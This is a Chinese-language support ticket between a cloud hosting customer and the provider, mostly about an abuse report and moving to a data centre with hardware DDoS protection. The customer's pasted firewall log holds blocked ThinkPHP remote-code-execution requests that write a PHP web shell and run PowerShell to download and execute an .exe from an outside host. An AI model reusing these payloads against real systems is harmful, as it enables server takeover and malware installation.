問:你好,最近一直有IP地址為:127.0.0.1 的主機 掃描我云主機,請幫核查,這個IP是誰的?,機房有主機攻擊云主機
答:您好,請提供攻擊的詳細說明我司協助核實 ,
非常感謝您長期對我司的支持,謝謝!
問: 13:03:48127.0.0.1GET/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET[‘xcmd‘];system($action);?^>>hydra.php已攔截get_referer
13:03:48127.0.0.1GET/public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile(‘http://fid.hognoob.se/download.exe‘,‘C:/Windows/temp/mnccmdfymjyibba13630.exe‘);start C:/Windows/temp/mnccmdfymjyibba13630.exe已攔截args
01:14:41127.0.0.1GET/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET[‘xcmd‘];system($action);?^>>hydra.php已攔截get_referer
01:14:41127.0.0.1GET/public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile(‘http://fid.hognoob.se/download.exe‘,‘C:/Windows/temp/mnccmdfymjyibba13630.exe‘);start C:/Windows/temp/mnccmdfymjyibba13630.exe已攔截args
答:您好,已經聯系此臺服務器客戶立即進行檢查處理 ,若處理不及時請反饋此工單
非常感謝您長期對我司的支持.由此給您帶來的不便之處,敬請原諒!謝謝!
問:上次受到攻擊的時候,貴公司建議我們更換機房到綿陽的有硬防的云主機,請問該主機該如何選擇?
答:您好,1、請在我司http://www.shinetop.cn/services/cloudhost/ 重新購買一臺云服務器選擇智能多線my機房,然后將當前服務器上的數據自行遷移到新的服務器上,然后回復工單,我司將當前服務器折算到新的服務器上。
2、相關硬件防護,可以參考http://www.shinetop.cn/services/cloudhost/ddos.asp 。
非常感謝您長期對我司的支持!
問:選了智能多線,但是不能選機房到嘛?
答:您好,1、選擇智能多線機房進行開通,開通后回復工單,我司為您更換到my機房即可,非常感謝您長期對我司的支持!